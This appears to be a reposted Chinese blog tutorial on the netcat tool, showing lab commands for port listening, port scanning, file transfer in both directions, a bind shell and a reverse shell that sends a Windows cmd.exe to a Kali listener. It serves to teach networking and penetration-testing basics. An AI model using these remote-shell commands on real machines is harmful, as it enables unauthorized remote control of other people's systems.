当前位置:   article > 正文

如何启动netcat_工具使用——netcat使用

windows netcat启动脚本

0X00工具简介:

Nc功能强大的网络工具,有着网络界得“瑞士军刀”美誉,因为它短小精悍、功能实用、被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据,同时他还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接。

0X01工具作用:

显示环境:

kali-2019 :172.16.11.21

windows 10 :172.16.11.2

参数:nc –l –p 3333

作用:实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。

例:如下图,侦听1234端口。

参数:nc –vzw 2 172.16.11.2

作用:端口扫描,nc可以作为client发起TCP或UDP连接。

例:如下图,扫描目标主机1-1000端口。

参数:kali-linux:nc –l –p 1234 > 1.txt

windows:nc 172.16.11.2 1234 < 1.txt

作用:正向文件传输

例:windows启动接收文件监听。

Kali连接并通过端口发送文件。

查看是否接收到文件。

注:这是正向传文件(windows开启接收文件监听kali连接并把1.txt通过端口传送给windows)。

参数:windows:nc –l –p 1234 < 1.txt

Kali-linux:nc 172.16.11.2 1234 > 1.txt

作用:反向传输文件

例如:kali先通过1234端口发送文件。

Windows连接并获取文件。

注:这是反向传文件(kali先通过1234端口发送文件,windows连接并获取文件)。

参数:windows:nc –l –p 1234 –t –e cmd.exe

Kali-linux:nc –nvv 172.16.11.2 1234

作用:正向连接shell

例:windows先开启监听cmd.exe。

Kali连接并获取cmd.exe。

注:正向连接shell(windows开启侦听,kali连接并获取,也就是哪台机器来连接我我就给哪台机器cmd.exe)。

参数:kali-linux:nc –l –p 1234

Windows:Nc –t –e cmd.exe 172.16.11.21 1234

作用:反弹shell

例:kali开启监听1234端口。

Windows带着cmd.exe连接并且给kali。

查看kali。

注:反弹shell(kali只需要开启监听,windows带着cmd.exe连接kali)。

正向连接(你连接我,我就把cmd给你),反向连接(我连接你的时候把我的cmd交给你,你只需要侦听就可以)。

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/194632?site
推荐阅读
相关标签
  

闽ICP备14008679号